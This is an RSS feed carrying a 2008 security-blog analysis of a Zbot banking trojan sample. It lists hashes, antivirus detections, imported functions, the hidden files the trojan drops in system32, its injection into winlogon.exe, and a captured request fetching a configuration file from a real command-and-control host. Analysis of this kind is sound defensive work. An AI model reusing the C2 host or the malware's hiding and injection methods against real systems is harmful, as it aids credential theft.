<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoVirusThanks Blog &#187; hidden files</title>
	<atom:link href="http://blog.novirusthanks.org/tag/hidden-files/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Security News and Malware Analysis</description>
	<lastBuildDate>Wed, 01 Feb 2012 13:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Trojan-Spy.Win32.Zbot &#8211; Analysis of Malware</title>
		<link>http://blog.novirusthanks.org/2008/11/trojan-spywin32zbot-analysis-of-malware/</link>
		<comments>http://blog.novirusthanks.org/2008/11/trojan-spywin32zbot-analysis-of-malware/#comments</comments>
		<pubDate>Mon, 17 Nov 2008 11:52:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[91.203.93.29]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Banker.DWV]]></category>
		<category><![CDATA[hidden files]]></category>
		<category><![CDATA[Trojan-Spy.Win32.Zbot]]></category>
		<category><![CDATA[twain_32]]></category>
		<category><![CDATA[twext exe malaware]]></category>
		<category><![CDATA[twext.exe]]></category>
		<category><![CDATA[Win32.Zbot]]></category>
		<category><![CDATA[winlogon.exe]]></category>
		<category><![CDATA[winlogon.exe inject]]></category>
		<category><![CDATA[Zbot]]></category>
		<category><![CDATA[ZBot.Gen]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=248</guid>
		<description><![CDATA[Analysis Content: Trojan-Spy.Win32.Zbot &#8211; Analysis of Malware Released: 16.11.2008 Author of Analysis: Robert Contact: robert@novirusthanks.org Website: http://novirusthanks.org My friend Steve sent to me some days ago a Trojan-Spy.Win32.Zbot sample and below there is the analysis: The file I received was named live.exe and below there is the report of the scan of the file: Report [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>Analysis Content: Trojan-Spy.Win32.Zbot &#8211; Analysis of Malware<br />
Released: 16.11.2008<br />
Author of Analysis: Robert<br />
Contact: robert@novirusthanks.org<br />
Website: http://novirusthanks.org</p></blockquote>
<p>My friend Steve sent to me some days ago a <em><strong>Trojan-Spy.Win32.Zbot</strong></em> sample and below there is the analysis:</p>
<p>The file I received was named <strong>live.exe</strong></p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Zbot_1.gif alt=" alt="" /></p>
<p>and below there is the report of the scan of the file:</p>
<blockquote><p>Report Generated 	17.11.2008 at 12.25.44 (GMT 1)<br />
Time for scan: 	23 seconds<br />
Filename: 	live.exe<br />
File size: 	67 KB<br />
MD5 Hash: 	A785276189E5387AF4C13536CFC76E65<br />
SHA1 Hash: 	31E1392EB9793EEDBA74038FBC0AF31382F91B73<br />
CRC32: 	2777692707<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">18</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/Spy.ZBot.Dro.2</span><br />
Avast 	<span style="color: red;">Win32:Downloader-CAT [Trj] (0)</span><br />
AVG 	<span style="color: red;">Trojan horse Pakes.ALW</span><br />
BitDefender 	<span style="color: red;">Trojan.Spy.Wsnpoem.LE</span><br />
ClamAV <span style="color: red;"> Trojan.Invo-4</span><br />
Comodo <span style="color: green;"> Nothing found!</span><br />
Dr.Web 	<span style="color: red;">Trojan.PWS.Panda.31</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr A</span><br />
IkarusT3 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr</span><br />
Kaspersky 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr</span><br />
McAfee 	<span style="color: red;">Spy-Agent.bw trojan</span><br />
NOD32 v3 	<span style="color: red;">Win32/Spy.Agent.NKC trojan</span><br />
Norman 	<span style="color: red;">Trojan W32/Banker.DWVI ()</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: red;">TrojanSpy.Zbot.gbr</span><br />
Solo Antivirus 	<span style="color: red;">Infection Trojan.Spy.Win32.Zbot.Gbr</span><br />
Sophos 	<span style="color: red;">Mal/EncPk-CZ</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr</span><br />
VirusBuster 	<span style="color: red;">TrojanSpy.ZBot.Gen!Pac.5</span></p></blockquote>
<p><strong>PE Import Tables</strong>:</p>
<blockquote><p>kernel32.dll<br />
+OpenFileMappingA<br />
+DeleteFileA<br />
+DeleteFileW<br />
+GetLastError<br />
+ExitThread<br />
+DeleteAtom<br />
+GetCPInfo<br />
+GetComputerNameA<br />
+GetFileSize<br />
+GetStdHandle<br />
+ReadFile<br />
+GlobalFree<br />
+WriteFile<br />
+GetCommandLineA<br />
+CreateProcessA<br />
+Sleep<br />
+GetConsoleMode<br />
+CreateThread<br />
+FindAtomA<br />
kernel32.dll<br />
+ExitThread<br />
+GlobalFree<br />
+CopyFileExW<br />
+CopyFileW<br />
+GetFileSize<br />
+ReadFile<br />
+GetFileTime<br />
+DeleteFileW<br />
+FindFirstFileA<br />
+GetCommandLineA<br />
+GetStdHandle<br />
+CreateDirectoryA<br />
+OpenFile<br />
+SetLastError<br />
+DeleteAtom<br />
+GetConsoleMode<br />
user32.dll<br />
+IsMenu<br />
+InsertMenuA<br />
+DrawTextW<br />
+GetWindowTextLengthA<br />
+AppendMenuW<br />
+DialogBoxParamW<br />
+GetFocus<br />
+GetWindowTextA<br />
+GetDlgItem<br />
+GetCursor<br />
+CopyIcon<br />
+EndDialog<br />
+CalcMenuBar<br />
+CreateIcon<br />
+BlockInput<br />
+GetMenu<br />
+GetDC<br />
+DrawIconEx<br />
+CloseWindow<br />
+AlignRects<br />
+IsWindow<br />
+DialogBoxParamA<br />
+LoadCursorA<br />
+CopyImage<br />
user32.dll<br />
+CreateIcon<br />
+GetFocus<br />
+BlockInput<br />
+InsertMenuA<br />
+EndDialog<br />
+DrawTextA<br />
+AlignRects<br />
+GetWindowTextLengthA<br />
+IsWindow<br />
+CloseWindow<br />
+CopyImage<br />
+GetDlgItem<br />
+AppendMenuW<br />
+LoadCursorA<br />
+LoadMenuA<br />
+DrawIcon<br />
+CopyIcon<br />
+GetDC<br />
+GetMenu<br />
+DrawIconEx<br />
+GetCursor<br />
+DialogBoxParamW<br />
+CopyRect<br />
kernel32.dll<br />
+GetConsoleMode<br />
+GetCPInfo<br />
+ExitThread<br />
+GetComputerNameA<br />
+GetStdHandle<br />
+ReadFile<br />
+CreateProcessA<br />
+CreateThread<br />
+SetLastError<br />
+CreateDirectoryA<br />
+DeleteAtom<br />
+WriteFile<br />
+Sleep<br />
+CopyFileW<br />
+GetFileSize<br />
+GetFileTime<br />
+CopyFileExW<br />
comctl32.dll<br />
+ImageList_DragLeave<br />
+ImageList_GetIcon<br />
comctl32.dll<br />
+ImageList_Copy<br />
comctl32.dll<br />
+ImageList_Merge<br />
advapi32.dll<br />
+RegCreateKeyW</p></blockquote>
<p>When I started this .EXE some files was copyed in <strong>C:\WINDOWS\system32\</strong> and below there is the list:</p>
<blockquote><p>C:\WINDOWS\system32\twext.exe<br />
C:\WINDOWS\system32\twain_32<br />
C:\WINDOWS\system32\twain_32\local.ds<br />
C:\WINDOWS\system32\twain_32\user.ds<br />
C:\Documents and Settings\NetworkService\Application Data\twain_32<br />
C:\Documents and Settings\NetworkService\Application Data\twain_32\user.ds<br />
C:\Documents and Settings\LocalService\Application Data\twain_32<br />
C:\Documents and Settings\LocalService\Application Data\twain_32\user.ds</p></blockquote>
<p>Below there is the report of the scan of the file <strong>twext.exe</strong>:</p>
<blockquote><p>Report Generated 	17.11.2008 at 12.47.07 (GMT 1)<br />
Time for scan: 	23 seconds<br />
Filename: 	twext.exe<br />
File size: 	244 KB<br />
MD5 Hash: 	1C6A2494488D455757B8B69CF499C6A0<br />
SHA1 Hash: 	27CFCD52F3AADC153976AFB12AFDB7AEC1CFF043<br />
CRC32: 	288333931<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found [Overlay] *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">16</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/Spy.ZBot.Dro.2</span><br />
Avast 	<span style="color: red;">Win32:Downloader-CAT [Trj] (0)</span><br />
AVG 	<span style="color: red;">Trojan horse Pakes.ALW</span><br />
BitDefender 	<span style="color: red;">Trojan.Spy.Wsnpoem.LE</span><br />
ClamAV 	<span style="color: red;">Trojan.Invo-4</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: red;">Trojan.PWS.Panda.31</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: red;">W32/Trojan3.HR (exact)</span><br />
G DATA 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr A</span><br />
IkarusT3 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr</span><br />
Kaspersky 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: red;">Win32/Spy.Agent.NKC trojan</span><br />
Norman 	<span style="color: red;">Trojan W32/Banker.DWVI ()</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: red;">TrojanSpy.Zbot.gbr</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: red;">Mal/EncPk-CZ</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: red;">Trojan-Spy.Win32.Zbot.gbr</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p></blockquote>
<p>The files located in <strong>C:\WINDOWS\system32\</strong> were <strong>Hidden</strong> from Explorer search as shown in image below:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Zbot_2.gif" alt="" /></p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Zbot_4.gif" alt="" /></p>
<p>Below there is an image of the encrypted content of the file <strong>user.ds</strong>:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Zbot_3.gif" alt="" /></p>
<p>The file <strong>C:\WINDOWS\system32\twext.exe</strong> was injected in the process <strong>winlogon.exe</strong> and started to send traffic to this host:</p>
<blockquote><p>==================================================<br />
Index             : 4<br />
Protocol          : TCP<br />
Local Address     : 192.168.1.4<br />
Remote Address    : 91.203.93.29<br />
Local Port        : 1039<br />
Remote Port       : 80<br />
Local Host        :<br />
Remote Host       :<br />
Service Name      : http<br />
Packets           : 10<br />
Data Size         : 828 Bytes<br />
Total Size        : 1.403 Bytes<br />
Capture Time      : 17/11/2008 12.21.31:078<br />
==================================================</p>
<p>GET /fidel/conf.bin HTTP/1.0<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)<br />
Host: ddtfff.ru<br />
Pragma: no-cache</p>
<p>HTTP/1.1 404 Not Found<br />
Date: Mon, 17 Nov 2008 18:53:05 GMT<br />
Server: Apache/2<br />
Content-Length: 392<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p></blockquote>
<p>But unfortunately the file <strong>GET /fidel/conf.bin HTTP/1.0</strong> that the malware try to download every X number of time</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Zbot_5.gif" alt="" /></p>
<p>does not exist anymore and i cannot analyze it.</p>
<p>Below there is a small summary of this malware activity:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Zbot_6.gif" alt="" /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/trojan-spywin32zbot-analysis-of-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

